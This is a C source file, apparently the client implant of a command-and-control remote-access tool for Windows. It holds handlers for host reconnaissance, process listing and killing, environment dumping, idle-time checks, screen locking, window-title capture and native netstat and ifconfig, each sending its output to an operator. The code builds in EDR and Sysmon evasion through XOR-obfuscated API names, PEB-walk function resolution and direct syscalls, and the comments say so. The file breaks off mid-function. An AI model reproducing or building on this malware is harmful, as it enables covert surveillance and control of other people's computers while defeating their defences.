/* AUTO-GENERATED by gen_obf.py — DO NOT EDIT. Source: handlers_system.c */

/*
 * client/handlers_system.c  –  System-information and filesystem shell handlers
 * ===============================================================================
 * Implements the native C2 verb handlers for:
 *   sysinfo        — OS, hostname, username, arch, CWD
 *   os_info        — extended OS info (build, install date, uptime)
 *   cd <path>      — SetCurrentDirectoryA
 *   ls [path]      — directory listing (name, size, date)
 *   ps             — running process list (PID, PPID, name, arch, owner)
 *   kill <pid>     — TerminateProcess
 *   env [filter]   — environment variables (optional substring filter)
 *   idle_time      — seconds since last user input
 *   lock_screen    — LockWorkStation
 *   active_windows — visible top-level window titles
 *
 * All functions are declared in shell_internal.h and only called from
 * the dispatch loop in shell.c.
 */

/* Require Vista+ APIs (MIB_EXTENDEDTCPTABLE, WLAN types) — must precede
 * ALL includes so the SDK headers see the correct _WIN32_WINNT value.     */
#ifndef _WIN32_WINNT
#  define _WIN32_WINNT 0x0600
#elif _WIN32_WINNT < 0x0600
#  undef  _WIN32_WINNT
#  define _WIN32_WINNT 0x0600
#endif

#include "shell_internal.h"
#include "../evasion/peb_walk.h"
#include "../evasion/syscall.h"
#include "../evasion/k32_walk.h"
#include "../evasion/obf.h"

#include <windows.h>
#include <winternl.h>
#include <iphlpapi.h>
#include <tcpmib.h>
#include <wlanapi.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* ── XOR blobs (gen_obf.py) ── */
#include "obf.h"
static const unsigned char _e_06f32d[] = { 0x35, 0x5B, 0x41, 0x51, 0x59, 0x59, 0x1B, 0x51, 0x59, 0x59, 0x35 }; /* obf:'ntdll.dll' */
static const unsigned char _e_426a86[] = { 0xEB, 0xB9, 0x9F, 0x87, 0xAC, 0x8E, 0x9F, 0xBD, 0x8E, 0x99, 0x98, 0x82, 0x84, 0x85, 0xEB }; /* obf:'RtlGetVersion' */
static const unsigned char _e_c05a06[] = { 0x3B, 0x52, 0x4B, 0x53, 0x57, 0x4B, 0x5A, 0x4B, 0x52, 0x15, 0x5F, 0x57, 0x57, 0x3B }; /* obf:'iphlpapi.dll' */
static const unsigned char _e_eb1ec7[] = { 0x2F, 0x44, 0x4A, 0x5D, 0x41, 0x4A, 0x43, 0x1C, 0x1D, 0x01, 0x4B, 0x43, 0x43, 0x2F }; /* obf:'kernel32.dll' */
static const unsigned char _e_e89270[] = { 0xA3, 0xEF, 0xCC, 0xC2, 0xC7, 0xEF, 0xCA, 0xC1, 0xD1, 0xC2, 0xD1, 0xDA, 0xE2, 0xA3 }; /* obf:'LoadLibraryA' */
static const unsigned char _e_ddf1af[] = { 0x1F, 0x58, 0x7A, 0x6B, 0x5A, 0x67, 0x6B, 0x7A, 0x71, 0x7B, 0x7A, 0x7B, 0x4B, 0x7C, 0x6F, 0x4B, 0x7E, 0x7D, 0x73, 0x7A, 0x1F }; /* obf:'GetExtendedTcpTable' */
static const unsigned char _e_96d087[] = { 0x55, 0x12, 0x30, 0x21, 0x10, 0x2D, 0x21, 0x30, 0x3B, 0x31, 0x30, 0x31, 0x00, 0x31, 0x25, 0x01, 0x34, 0x37, 0x39, 0x30, 0x55 }; /* obf:'GetExtendedUdpTable' */
static const unsigned char _e_146df1[] = { 0x2B, 0x6C, 0x4E, 0x5F, 0x62, 0x5B, 0x65, 0x4E, 0x5F, 0x7F, 0x4A, 0x49, 0x47, 0x4E, 0x19, 0x2B }; /* obf:'GetIpNetTable2' */
static const unsigned char _e_df4be7[] = { 0xFD, 0xBB, 0x8F, 0x98, 0x98, 0xB0, 0x94, 0x9F, 0xA9, 0x9C, 0x9F, 0x91, 0x98, 0xFD }; /* obf:'FreeMibTable' */
static const unsigned char _e_cff9dc[] = { 0xB7, 0xF0, 0xD2, 0xC3, 0xFE, 0xC7, 0xF1, 0xD8, 0xC5, 0xC0, 0xD6, 0xC5, 0xD3, 0xE3, 0xD6, 0xD5, 0xDB, 0xD2, 0x85, 0xB7 }; /* obf:'GetIpForwardTable2' */
static const unsigned char _e_8fc28e[] = { 0xB3, 0xE4, 0xDF, 0xD2, 0xDD, 0xFC, 0xC3, 0xD6, 0xDD, 0xFB, 0xD2, 0xDD, 0xD7, 0xDF, 0xD6, 0xB3 }; /* obf:'WlanOpenHandle' */
static const unsigned char _e_e7aee4[] = { 0x1F, 0x48, 0x73, 0x7E, 0x71, 0x5C, 0x73, 0x70, 0x6C, 0x7A, 0x57, 0x7E, 0x71, 0x7B, 0x73, 0x7A, 0x1F }; /* obf:'WlanCloseHandle' */
static const unsigned char _e_2d3977[] = { 0x77, 0x20, 0x1B, 0x16, 0x19, 0x32, 0x19, 0x02, 0x1A, 0x3E, 0x19, 0x03, 0x12, 0x05, 0x11, 0x16, 0x14, 0x12, 0x04, 0x77 }; /* obf:'WlanEnumInterfaces' */
static const unsigned char _e_d327ee[] = { 0xE9, 0xBE, 0x85, 0x88, 0x87, 0xAE, 0x8C, 0x9D, 0xB9, 0x9B, 0x86, 0x8F, 0x80, 0x85, 0x8C, 0xA5, 0x80, 0x9A, 0x9D, 0xE9 }; /* obf:'WlanGetProfileList' */
static const unsigned char _e_af01f1[] = { 0xCF, 0x98, 0xA3, 0xAE, 0xA1, 0x88, 0xAA, 0xBB, 0x9F, 0xBD, 0xA0, 0xA9, 0xA6, 0xA3, 0xAA, 0xCF }; /* obf:'WlanGetProfile' */
static const unsigned char _e_d1f2dd[] = { 0x83, 0xD4, 0xEF, 0xE2, 0xED, 0xC5, 0xF1, 0xE6, 0xE6, 0xCE, 0xE6, 0xEE, 0xEC, 0xF1, 0xFA, 0x83 }; /* obf:'WlanFreeMemory' */
static const unsigned char _e_a64fcd[] = { 0xA1, 0xD6, 0xCD, 0xC0, 0xCF, 0xC0, 0xD1, 0xC8, 0x8F, 0xC5, 0xCD, 0xCD, 0xA1 }; /* obf:'wlanapi.dll' */
/* ── end XOR blobs ── */




/* ── _handle_sysinfo ────────────────────────────────────────────────────── */

void _handle_sysinfo(TLS_CONTEXT *pTls)
{
    char hostname[MAX_COMPUTERNAME_LENGTH + 1] = {0};
    DWORD cbHost = sizeof(hostname);
    GetComputerNameA(hostname, &cbHost);

    char username[256] = {0};
    DWORD cbUser = sizeof(username);
    GetUserNameA(username, &cbUser);

    char cwd[MAX_PATH] = {0};
    GetCurrentDirectoryA(sizeof(cwd), cwd);

    OSVERSIONINFOEXW osvi = {0};
    osvi.dwOSVersionInfoSize = sizeof(osvi);
    typedef NTSTATUS (WINAPI *RtlGetVersion_t)(PRTL_OSVERSIONINFOW);
    PVOID hNtdll_ = peb_get_module(peb_hash_str(OBF_S(_e_06f32d, 10)));
    RtlGetVersion_t pRtlGetVersion =
        (RtlGetVersion_t)(hNtdll_ ? peb_get_export(hNtdll_, peb_hash_str(OBF_S(_e_426a86, 14))) : NULL);
    if (pRtlGetVersion)
        pRtlGetVersion((PRTL_OSVERSIONINFOW)&osvi);

    SYSTEM_INFO si = {0};
    GetNativeSystemInfo(&si);
    const char *arch = "x86";
    if      (si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64) arch = "x64";
    else if (si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_ARM64) arch = "ARM64";

    char buf[4096] = {0};
    _snprintf(buf, sizeof(buf) - 1,
        "[*] System Information\n"
        "    OS:           Windows %lu.%lu (Build %lu)\n"
        "    Hostname:     %s\n"
        "    Username:     %s\n"
        "    Architecture: %s\n"
        "    CWD:          %s",
        osvi.dwMajorVersion, osvi.dwMinorVersion, osvi.dwBuildNumber,
        hostname, username, arch, cwd);

    _send_str(pTls, buf);
}


/* ── _handle_os_info ────────────────────────────────────────────────────── */

void _handle_os_info(TLS_CONTEXT *pTls)
{
    OSVERSIONINFOEXW osvi = {0};
    osvi.dwOSVersionInfoSize = sizeof(osvi);
    typedef NTSTATUS (WINAPI *RtlGetVersion_t)(PRTL_OSVERSIONINFOW);
    PVOID hNtdll2_ = peb_get_module(peb_hash_str(OBF_S(_e_06f32d, 10)));
    RtlGetVersion_t pRtlGetVersion =
        (RtlGetVersion_t)(hNtdll2_ ? peb_get_export(hNtdll2_, peb_hash_str(OBF_S(_e_426a86, 14))) : NULL);
    if (pRtlGetVersion)
        pRtlGetVersion((PRTL_OSVERSIONINFOW)&osvi);

    ULONGLONG ms   = GetTickCount64();
    ULONGLONG secs = ms / 1000;
    ULONGLONG days = secs / 86400; secs %= 86400;
    ULONGLONG hrs  = secs / 3600;  secs %= 3600;
    ULONGLONG mins = secs / 60;    secs %= 60;

    char installDate[64] = "(unknown)";
    HKEY hKey = NULL;
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE,
            "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
            0, KEY_READ, &hKey) == ERROR_SUCCESS) {
        DWORD dwInstall = 0;
        DWORD cbVal = sizeof(dwInstall);
        if (RegQueryValueExA(hKey, "InstallDate", NULL, NULL,
                             (LPBYTE)&dwInstall, &cbVal) == ERROR_SUCCESS) {
            /*
             * dwInstall is a Unix epoch timestamp (seconds since 1970-01-01).
             * Convert to FILETIME (100-nanosecond intervals since 1601-01-01):
             *   ft = (unix_epoch + 11644473600) * 10000000
             * Use LONGLONG (== __int64) for 64-bit arithmetic on all targets;
             * guard against an obviously bogus value (0 or before 1970) before
             * doing any arithmetic to avoid UB.
             */
            if (dwInstall > 0) {
                LONGLONG ft = ((LONGLONG)(DWORD)dwInstall + 11644473600LL)
                              * 10000000LL;
                FILETIME ftFile;
                ftFile.dwLowDateTime  = (DWORD)((ULONGLONG)ft & 0xFFFFFFFFUL);
                ftFile.dwHighDateTime = (DWORD)((ULONGLONG)ft >> 32);
                SYSTEMTIME st = {0};
                if (FileTimeToSystemTime(&ftFile, &st))
                    _snprintf(installDate, sizeof(installDate) - 1,
                        "%04d-%02d-%02d", st.wYear, st.wMonth, st.wDay);
            }
        }
        RegCloseKey(hKey);
    }

    char sp[128] = {0};
    WideCharToMultiByte(CP_ACP, 0, osvi.szCSDVersion, -1,
                        sp, sizeof(sp) - 1, NULL, NULL);

    char buf[1024] = {0};
    _snprintf(buf, sizeof(buf) - 1,
        "[*] OS Info\n"
        "    Version:      Windows %lu.%lu (Build %lu) %s\n"
        "    Install date: %s\n"
        "    Uptime:       %llud %lluh %llum %llus",
        osvi.dwMajorVersion, osvi.dwMinorVersion, osvi.dwBuildNumber,
        sp[0] ? sp : "",
        installDate,
        days, hrs, mins, secs);

    _send_str(pTls, buf);
}


/* ── _handle_cd ─────────────────────────────────────────────────────────── */

void _handle_cd(TLS_CONTEXT *pTls, const char *path)
{
    if (SetCurrentDirectoryA(path)) {
        char cwd[MAX_PATH] = {0};
        GetCurrentDirectoryA(sizeof(cwd), cwd);
        char buf[MAX_PATH + 16];
        _snprintf(buf, sizeof(buf) - 1, "[+] cwd: %s", cwd);
        _send_str(pTls, buf);
    } else {
        char buf[MAX_PATH + 32];
        _snprintf(buf, sizeof(buf) - 1, "[-] Not found: %s", path);
        _send_str(pTls, buf);
    }
}


/* ── _handle_ls ─────────────────────────────────────────────────────────── */

void _handle_ls(TLS_CONTEXT *pTls, const char *path)
{
    char target[MAX_PATH]  = {0};
    char pattern[MAX_PATH] = {0};

    if (path && *path)
        strncpy(target, path, MAX_PATH - 1);
    else
        GetCurrentDirectoryA(sizeof(target), target);

    _snprintf(pattern, sizeof(pattern) - 1, "%s\\*", target);

    WIN32_FIND_DATAA ffd;
    HANDLE hFind = FindFirstFileA(pattern, &ffd);
    if (hFind == INVALID_HANDLE_VALUE) {
        char err[MAX_PATH + 32];
        _snprintf(err, sizeof(err) - 1, "[-] ls: cannot open: %s", target);
        _send_str(pTls, err);
        return;
    }

    size_t bufSize = 16384;
    char  *buf = (char *)malloc(bufSize);
    if (!buf) { FindClose(hFind); _send_str(pTls, "[-] ls: OOM"); return; }

    int off = _snprintf(buf, bufSize - 1, "Directory of %s\n\n", target);
    if (off < 0) off = 0;

    do {
        if (strcmp(ffd.cFileName, ".") == 0 || strcmp(ffd.cFileName, "..") == 0)
            continue;

        BOOL isDir  = (ffd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)     != 0;
        BOOL isLink = (ffd.dwFileAttributes & FILE_ATTRIBUTE_REPARSE_POINT) != 0;

        SYSTEMTIME st = {0};
        FILETIME   ft = ffd.ftLastWriteTime;
        FileTimeToLocalFileTime(&ft, &ft);
        FileTimeToSystemTime(&ft, &st);

        char line[512];
        int  lineLen;

        if (isDir) {
            lineLen = _snprintf(line, sizeof(line) - 1,
                "  [%s]  %-40s  %04d-%02d-%02d %02d:%02d\n",
                isLink ? "LNK" : "DIR", ffd.cFileName,
                st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute);
        } else {
            ULONGLONG sz = ((ULONGLONG)ffd.nFileSizeHigh << 32) | ffd.nFileSizeLow;
            lineLen = _snprintf(line, sizeof(line) - 1,
                "  [%s]  %-40s  %12llu bytes  %04d-%02d-%02d %02d:%02d\n",
                isLink ? "LNK" : "   ", ffd.cFileName,
                (unsigned long long)sz,
                st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute);
        }

        if (lineLen > 0) {
            if ((size_t)(off + lineLen + 2) >= bufSize) {
                bufSize *= 2;
                char *p = (char *)realloc(buf, bufSize);
                if (!p) break;
                buf = p;
            }
            memcpy(buf + off, line, lineLen);
            off += lineLen;
        }
    } while (FindNextFileA(hFind, &ffd));

    FindClose(hFind);
    buf[off] = '\0';

    if (off > 0) tls_send_msg(pTls, (const BYTE *)buf, (DWORD)off);
    else         _send_str(pTls, "(empty directory)");

    free(buf);
}


/* ── _handle_ps ─────────────────────────────────────────────────────────── */
/*
 * Uses NtQuerySystemInformation(SystemProcessInformation=5) via direct syscall
 * instead of CreateToolhelp32Snapshot to avoid the high-signal kernel callback
 * that all major EDRs register on the Toolhelp API path.
 *
 * SYSTEM_PROCESS_INFORMATION x64 field offsets (memcpy-based, no struct cast):
 *   +0x00  NextEntryOffset  (ULONG)
 *   +0x38  ImageName.Length (USHORT)
 *   +0x3A  ImageName.MaxLen (USHORT)
 *   +0x40  ImageName.Buffer (PWSTR)
 *   +0x58  InheritedFromUniqueProcessId (HANDLE) — parent PID
 *   +0x60  UniqueProcessId  (HANDLE)
 */
void _handle_ps(TLS_CONTEXT *pTls)
{
    /* Probe buffer size */
    ULONG bufSz = 0;
    SC_NtQuerySystemInformation(5, NULL, 0, &bufSz);
    if (bufSz == 0) bufSz = 1024 * 1024;
    bufSz += 65536;  /* pad for new processes between calls */

    BYTE *spi_buf = (BYTE *)malloc(bufSz);
    if (!spi_buf) { _send_str(pTls, "[-] ps: OOM"); return; }

    ULONG retLen = 0;
    NTSTATUS ns = SC_NtQuerySystemInformation(5, spi_buf, bufSz, &retLen);
    if (!NT_SUCCESS(ns)) {
        free(spi_buf);
        _send_str(pTls, "[-] ps: NtQuerySystemInformation failed");
        return;
    }

    /* Output buffer */
    size_t outSz = 65536;
    char  *buf   = (char *)malloc(outSz);
    if (!buf) { free(spi_buf); _send_str(pTls, "[-] ps: OOM (output)"); return; }

    int off = _snprintf(buf, outSz - 1,
        "  %-8s %-8s %-40s %-6s %s\n"
        "  %-8s %-8s %-40s %-6s %s\n",
        "PID", "PPID", "Name", "Arch", "User",
        "---", "----", "----", "----", "----");
    if (off < 0) off = 0;

    const BYTE *p = spi_buf;
    int count = 0;
    for (;;) {
        ULONG  nextOff;
        USHORT nameLen;
        PVOID  nameBuf;
        HANDLE pid, ppid;

        memcpy(&nextOff, p + 0x00, 4);
        memcpy(&nameLen, p + 0x38, 2);
        memcpy(&nameBuf, p + 0x40, sizeof(PVOID));
        memcpy(&ppid,    p + 0x58, sizeof(HANDLE));
        memcpy(&pid,     p + 0x60, sizeof(HANDLE));

        DWORD dwPid  = (DWORD)(ULONG_PTR)pid;
        DWORD dwPpid = (DWORD)(ULONG_PTR)ppid;

        /* Convert ImageName UNICODE_STRING to UTF-8 */
        char exeName[MAX_PATH] = {0};
        if (nameLen > 0 && nameBuf) {
            int wlen = (int)(nameLen / sizeof(WCHAR));
            if (wlen > (int)(sizeof(exeName) - 1)) wlen = (int)(sizeof(exeName) - 1);
            WideCharToMultiByte(CP_UTF8, 0, (LPCWCH)nameBuf, wlen,
                                exeName, (int)sizeof(exeName) - 1, NULL, NULL);
        } else {
            strncpy(exeName, "(System)", sizeof(exeName) - 1);
        }

        /* WOW64 / owner via query-only handle */
        const char *arch = "x64";
        char ownerBuf[256] = {0};

        HANDLE hProc = k32_OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, dwPid);
        if (hProc) {
            BOOL bWow64 = FALSE;
            IsWow64Process(hProc, &bWow64);
            if (bWow64) arch = "x86";

            HANDLE hTok = NULL;
            if (k32_OpenProcessToken(hProc, TOKEN_QUERY, &hTok)) {
                DWORD cbTI = 0;
                GetTokenInformation(hTok, TokenUser, NULL, 0, &cbTI);
                if (cbTI > 0) {
                    BYTE *pTI = (BYTE *)malloc(cbTI);
                    if (pTI && GetTokenInformation(hTok, TokenUser, pTI, cbTI, &cbTI)) {
                        TOKEN_USER *pTU = (TOKEN_USER *)pTI;
                        char name[128] = {0}, domain[128] = {0};
                        DWORD cbN = sizeof(name), cbD = sizeof(domain);
                        SID_NAME_USE snu;
                        if (LookupAccountSidA(NULL, pTU->User.Sid,
                                              name, &cbN, domain, &cbD, &snu))
                            _snprintf(ownerBuf, sizeof(ownerBuf) - 1,
                                "%s\\%s", domain, name);
                    }
                    free(pTI);
                }
                CloseHandle(hTok);
            }
            CloseHandle(hProc);
            if (!ownerBuf[0]) strncpy(ownerBuf, "(unknown)", sizeof(ownerBuf) - 1);
        } else {
            strncpy(ownerBuf, "(access denied)", sizeof(ownerBuf) - 1);
            arch = "?";
        }

        char line[512];
        int lineLen = _snprintf(line, sizeof(line) - 1,
            "  %-8lu %-8lu %-40s %-6s %s\n",
            (unsigned long)dwPid, (unsigned long)dwPpid,
            exeName, arch, ownerBuf);

        if (lineLen > 0) {
            if ((size_t)(off + lineLen + 2) >= outSz) {
                outSz *= 2;
                char *pp = (char *)realloc(buf, outSz);
                if (!pp) break;
                buf = pp;
            }
            memcpy(buf + off, line, lineLen);
            off += lineLen;
        }

        if (++count >= PS_MAX_PROCS) break;
        if (nextOff == 0) break;
        p += nextOff;
    }

    free(spi_buf);
    buf[off] = '\0';

    if (off > 0) tls_send_msg(pTls, (const BYTE *)buf, (DWORD)off);
    else         _send_str(pTls, "(no processes)");

    free(buf);
}


/* ── _handle_kill ───────────────────────────────────────────────────────── */

void _handle_kill(TLS_CONTEXT *pTls, const char *args)
{
    DWORD pid = (DWORD)strtoul(args, NULL, 10);
    if (pid == 0) { _send_str(pTls, "Usage: kill <pid>"); return; }

    HANDLE hProc = k32_OpenProcess(PROCESS_TERMINATE, FALSE, pid);
    if (!hProc) {
        char buf[64];
        _snprintf(buf, sizeof(buf) - 1,
            "[-] kill: OpenProcess(%lu) failed (err %lu)",
            (unsigned long)pid, GetLastError());
        _send_str(pTls, buf);
        return;
    }
    BOOL ok = k32_TerminateProcess(hProc, 1);
    CloseHandle(hProc);

    char buf[64];
    if (ok)
        _snprintf(buf, sizeof(buf) - 1, "[+] killed PID %lu", (unsigned long)pid);
    else
        _snprintf(buf, sizeof(buf) - 1,
            "[-] kill: TerminateProcess failed (err %lu)", GetLastError());
    _send_str(pTls, buf);
}


/* ── _handle_env ────────────────────────────────────────────────────────── */

void _handle_env(TLS_CONTEXT *pTls, const char *filter)
{
    LPWCH envW = GetEnvironmentStringsW();
    if (!envW) { _send_str(pTls, "[-] env: GetEnvironmentStringsW failed"); return; }

    size_t bufSize = 32768;
    char  *buf = (char *)malloc(bufSize);
    if (!buf) { FreeEnvironmentStringsW(envW); _send_str(pTls, "[-] env: OOM"); return; }

    int off = 0;
    const WCHAR *pw = envW;
    while (*pw) {
        char line[2048] = {0};
        WideCharToMultiByte(CP_ACP, 0, pw, -1, line, sizeof(line) - 1, NULL, NULL);
        size_t len = strlen(line);
        pw += wcslen(pw) + 1;

        if (line[0] == '=') continue;   /* skip hidden "=X:=..." vars */

        int match = 1;
        if (filter && *filter) {
            const char *h = line;
            match = 0;
            while (*h) {
                const char *hh = h, *nn = filter;
                while (*hh && *nn && ((*hh | 0x20) == (*nn | 0x20))) { hh++; nn++; }
                if (!*nn) { match = 1; break; }
                h++;
            }
        }
        if (match) {
            if ((size_t)(off + len + 2) >= bufSize) {
                bufSize *= 2;
                char *np = (char *)realloc(buf, bufSize);
                if (!np) break;
                buf = np;
            }
            memcpy(buf + off, line, len);
            off += (int)len;
            buf[off++] = '\n';
        }
    }
    FreeEnvironmentStringsW(envW);
    buf[off] = '\0';

    if (off > 0) tls_send_msg(pTls, (const BYTE *)buf, (DWORD)off);
    else         _send_str(pTls, filter ? "[-] env: no matches" : "(empty environment)");

    free(buf);
}


/* ── _handle_idle_time ──────────────────────────────────────────────────── */

void _handle_idle_time(TLS_CONTEXT *pTls)
{
    LASTINPUTINFO lii;
    lii.cbSize = sizeof(lii);
    if (!GetLastInputInfo(&lii)) {
        _send_str(pTls, "[-] idle_time: GetLastInputInfo failed");
        return;
    }
    DWORD idleMs = GetTickCount() - lii.dwTime;
    char buf[64];
    _snprintf(buf, sizeof(buf) - 1,
        "[*] idle_time: %lu seconds", (unsigned long)(idleMs / 1000));
    _send_str(pTls, buf);
}


/* ── _handle_lock_screen ────────────────────────────────────────────────── */

void _handle_lock_screen(TLS_CONTEXT *pTls)
{
    if (LockWorkStation())
        _send_str(pTls, "[+] workstation locked");
    else {
        char buf[64];
        _snprintf(buf, sizeof(buf) - 1,
            "[-] lock_screen: LockWorkStation failed (err %lu)", GetLastError());
        _send_str(pTls, buf);
    }
}


/* ── _handle_active_windows ─────────────────────────────────────────────── */

typedef struct { char *buf; size_t bufSize; int off; } _WinEnum;

static BOOL CALLBACK _enum_windows_cb(HWND hwnd, LPARAM lParam)
{
    _WinEnum *e = (_WinEnum *)lParam;
    if (!IsWindowVisible(hwnd)) return TRUE;

    char title[256] = {0};
    GetWindowTextA(hwnd, title, sizeof(title) - 1);
    if (!title[0]) return TRUE;

    int len = (int)strlen(title);
    if ((size_t)(e->off + len + 2) >= e->bufSize) {
        e->bufSize *= 2;
        char *p = (char *)realloc(e->buf, e->bufSize);
        if (!p) return FALSE;
        e->buf = p;
    }
    memcpy(e->buf + e->off, title, len);
    e->off += len;
    e->buf[e->off++] = '\n';
    return TRUE;
}

void _handle_active_windows(TLS_CONTEXT *pTls)
{
    _WinEnum e;
    e.bufSize = 8192;
    e.off     = 0;
    e.buf     = (char *)malloc(e.bufSize);
    if (!e.buf) { _send_str(pTls, "[-] active_windows: OOM"); return; }

    EnumWindows(_enum_windows_cb, (LPARAM)&e);
    e.buf[e.off] = '\0';

    if (e.off > 0) tls_send_msg(pTls, (const BYTE *)e.buf, (DWORD)e.off);
    else           _send_str(pTls, "(no visible windows)");

    free(e.buf);
}


/* ═══════════════════════════════════════════════════════════════════════════
 * F-10 — Native replacements for high-signal cmd.exe fallback verbs
 * ═══════════════════════════════════════════════════════════════════════════
 * These implementations use Windows IP Helper APIs directly so no cmd.exe
 * child process is ever spawned.  Spawning cmd.exe with reconnaissance
 * arguments is logged in full by Sysmon Event ID 1 and every EDR product.
 * ═══════════════════════════════════════════════════════════════════════════ */

/* ── _handle_netstat ──────────────────────────────────────────────────────── */
/*
 * Replaces: _shell_exec(pTls, "netstat -ano 2>&1")
 * API: GetExtendedTcpTable + GetExtendedUdpTable (iphlpapi.dll)
 * No child process, no cmd.exe, no Sysmon Event ID 1.
 */
void _handle_netstat(TLS_CONTEXT *pTls)
{
    /* Resolve iphlpapi lazily via PEB walk — avoids adding it to the IAT */
    typedef DWORD (WINAPI *GetExtTcpTable_t)(PVOID, PDWORD, BOOL, ULONG, TCP_TABLE_CLASS, ULONG);
    typedef DWORD (WINAPI *GetExtUdpTable_t)(PVOID, PDWORD, BOOL, ULONG, UDP_TABLE_CLASS, ULONG);

    PVOID hIph = peb_get_module(peb_hash_str(OBF_S(_e_c05a06, 13)));
    if (!hIph) {
        /* Not yet loaded — load it via PEB-resolved LoadLibraryA */
        typedef HMODULE (WINAPI *pLL_t)(LPCSTR);
        PVOID hK32ll = peb_get_module(peb_hash_str(OBF_S(_e_eb1ec7, 13)));
        pLL_t pLL = hK32ll ? (pLL_t)(void *)peb_get_export(hK32ll, peb_hash_str(OBF_S(_e_e89270, 13))) : NULL;
        if (pLL) { char _dlln[16]; SLIT_BUF(_dlln, sizeof(_dlln), OBF_S(_e_c05a06, 13)); pLL(_dlln); }
        hIph = peb_get_module(peb_hash_str(OBF_S(_e_c05a06, 13)));
        if (!hIph) { _send_str(pTls, "[-] netstat: iphlpapi not available"); return; }
    }

    GetExtTcpTable_t pGetTcp = (GetExtTcpTable_t)peb_get_export(hIph,
                                    peb_hash_str(OBF_S(_e_ddf1af, 20)));
    GetExtUdpTable_t pGetUdp = (GetExtUdpTable_t)peb_get_export(hIph,
                                    peb_hash_str(OBF_S(_e_96d087, 20)));
    if (!pGetTcp || !pGetUdp) {
        _send_str(pTls, "[-] netstat: GetExtendedTcpTable/Udp not found"); return;
    }

    size_t bufSize = 16384;
    char  *out = (char *)malloc(bufSize);
    if (!out) { _send_str(pTls, "[-] netstat: OOM"); return; }
    int off = _snprintf(out, bufSize - 1,
        "  %-6s %-22s %-22s %-12s %s\n"
        "  %-6s %-22s %-22s %-12s %s\n",
        "Proto", "Local Address", "Foreign Address", "State", "PID",
        "-----", "-------------", "---------------", "-----", "---");
    if (off < 0) off = 0;

    /* TCP4 */
    DWORD tcpSz = 0;
    pGetTcp(NULL, &tcpSz, FALSE, AF_INET, TCP_TABLE_OWNER_PID_ALL, 0);
    if (tcpSz) {
        MIB_TCPTABLE_OWNER_PID *t = (MIB_TCPTABLE_OWNER_PID *)malloc(tcpSz);
        if (t && pGetTcp(t, &tcpSz, FALSE, AF_INET, TCP_TABLE_OWNER_PID_ALL, 0) == NO_ERROR) {
            static const char *states[] = {
                "","CLOSED","LISTEN","SYN_SENT","SYN_RCVD","ESTAB",
                "FIN_WAIT1","FIN_WAIT2","CLOSE_WAIT","CLOSING","LAST_ACK",
                "TIME_WAIT","DELETE_TCB"
            };
            for (DWORD i = 0; i < t->dwNumEntries; i++) {
                MIB_TCPROW_OWNER_PID *r = &t->table[i];
                struct in_addr la, fa;
                la.S_un.S_addr = r->dwLocalAddr;
                fa.S_un.S_addr = r->dwRemoteAddr;
                char laStr[32], faStr[32];
                _snprintf(laStr, sizeof(laStr)-1, "%s:%u",
                          inet_ntoa(la), ntohs((USHORT)r->dwLocalPort));
                _snprintf(faStr, sizeof(faStr)-1, "%s:%u",
                          inet_ntoa(fa), ntohs((USHORT)r->dwRemotePort));
                const char *st = (r->dwState < 13) ? states[r->dwState] : "?";
                char line[160];
                int ll = _snprintf(line, sizeof(line)-1,
                    "  %-6s %-22s %-22s %-12s %lu\n",
                    "TCP", laStr, faStr, st, (unsigned long)r->dwOwningPid);
                if (ll > 0 && (size_t)(off + ll + 2) < bufSize) {
                    memcpy(out + off, line, ll); off += ll;
                }
            }
        }
        free(t);
    }

    /* UDP4 */
    DWORD udpSz = 0;
    pGetUdp(NULL, &udpSz, FALSE, AF_INET, UDP_TABLE_OWNER_PID, 0);
    if (udpSz) {
        MIB_UDPTABLE_OWNER_PID *u = (MIB_UDPTABLE_OWNER_PID *)malloc(udpSz);
        if (u && pGetUdp(u, &udpSz, FALSE, AF_INET, UDP_TABLE_OWNER_PID, 0) == NO_ERROR) {
            for (DWORD i = 0; i < u->dwNumEntries; i++) {
                MIB_UDPROW_OWNER_PID *r = &u->table[i];
                struct in_addr la; la.S_un.S_addr = r->dwLocalAddr;
                char laStr[32];
                _snprintf(laStr, sizeof(laStr)-1, "%s:%u",
                          inet_ntoa(la), ntohs((USHORT)r->dwLocalPort));
                char line[120];
                int ll = _snprintf(line, sizeof(line)-1,
                    "  %-6s %-22s %-22s %-12s %lu\n",
                    "UDP", laStr, "*:*", "", (unsigned long)r->dwOwningPid);
                if (ll > 0 && (size_t)(off + ll + 2) < bufSize) {
                    memcpy(out + off, line, ll); off += ll;
                }
            }
        }
        free(u);
    }

    out[off] = '\0';
    tls_send_msg(pTls, (const BYTE *)out, (DWORD)off);
    free(out);
}


/* ── _handle_ifconfig ─────────────────────────────────────────────────────── */
/*
 * Replaces: _shell_exec(pTls, "ipconfig /all 2>&1")
 * API: GetAdaptersAddresses (iphlpapi.dll)
 */
void _handle_ifconfig(TLS_CONTEXT *pTls)
{
    ULONG bufLen = 15000;
    PIP_ADAPTER_ADDRESSES pAddrs = NULL;
    DWORD rc;

    /* Retry once if buffer is too small */
    for (int attempt = 0; attempt < 2; attempt++) {
        pAddrs = (PIP_ADAPTER_ADDRESSES)malloc(bufLen);
        if (!pAddrs) { _send_str(pTls, "[-] ifconfig: OOM"); return; }
        rc = GetAdaptersAddresses(AF_UNSPEC,
                 GAA_FLAG_INCLUDE_PREFIX | GAA_FLAG_SKIP_ANYCAST,
                 NULL, pAddrs, &bufLen);
        if (rc == NO_ERROR) break;
        free(pAddrs); pAddrs = NULL;
        if (rc != ERROR_BUFFER_OVERFLOW) break;
    }
    if (!pAddrs || rc != NO_ERROR) {
        _send_str(pTls, "[-] ifconfig: GetAdaptersAddresses failed");
        free(pAddrs); return;
    }

    size_t bufSize = 32768;
    char  *out = (char *)malloc(bufSize);
    if (!out) { free(pAddrs); _send_str(pTls, "[-] ifconfig: OOM"); return; }
    int off = 0;

    for (PIP_ADAPTER_ADDRESSES p = pAddrs; p; p = p->Next) {
        char friendlyName[256] = {0};
        WideCharToMultiByte(CP_ACP, 0, p->FriendlyName, -1,
                            friendlyName, sizeof(friendlyName)-1, NULL, NULL);

        char line[512];
